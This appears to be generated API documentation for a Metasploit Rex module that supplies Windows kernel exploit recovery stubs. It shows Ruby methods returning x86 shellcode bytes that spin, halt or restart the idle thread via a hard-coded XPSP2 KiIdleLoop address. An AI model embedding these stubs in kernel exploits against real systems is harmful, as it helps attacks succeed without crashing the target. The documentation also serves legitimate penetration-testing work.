Module: Rex::Payloads::Win32::Kernel::Recovery
- Defined in:
- lib/rex/payloads/win32/kernel/recovery.rb
Overview
Recovery stubs are responsible for ensuring that the kernel does not crash. They must ‘recover’ after the exploit has succeeded, either by consuming the thread or continuing it on with its normal execution. Recovery stubs will often be exploit dependent.
Class Method Summary collapse
-
.default(opts = {}) ⇒ Object
The default recovery method is to spin the thread.
-
.idlethread_restart(opts = {}) ⇒ Object
Restarts the idle thread by jumping back to the entry point of KiIdleLoop.
-
.spin(opts = {}) ⇒ Object
Infinite ‘hlt’ loop.
Class Method Details
.default(opts = {}) ⇒ Object
The default recovery method is to spin the thread
17 18 19 |
# File 'lib/rex/payloads/win32/kernel/recovery.rb', line 17 def self.default(opts = {}) spin(opts) end |
.idlethread_restart(opts = {}) ⇒ Object
Restarts the idle thread by jumping back to the entry point of KiIdleLoop. This requires a hard-coded address of KiIdleLoop. You can pass the ‘KiIdleLoopAddress’ in the options hash.
33 34 35 36 37 38 39 40 41 42 43 |
# File 'lib/rex/payloads/win32/kernel/recovery.rb', line 33 def self.idlethread_restart(opts = {}) # Default to fully patched XPSP2 opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil? "\x31\xC0" + # xor eax,eax "\x64\xC6\x40\x24\x02" + # mov byte [fs:eax+0x24],0x2 "\x8B\x1D\x1C\xF0\xDF\xFF" + # mov ebx,[0xffdff01c] "\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27 "\x6A\x00" + # push byte +0x0 "\xFF\xE0" # jmp eax end |
.spin(opts = {}) ⇒ Object
Infinite ‘hlt’ loop.
24 25 26 |
# File 'lib/rex/payloads/win32/kernel/recovery.rb', line 24 def self.spin(opts = {}) "\xf4\xeb\xfd" end |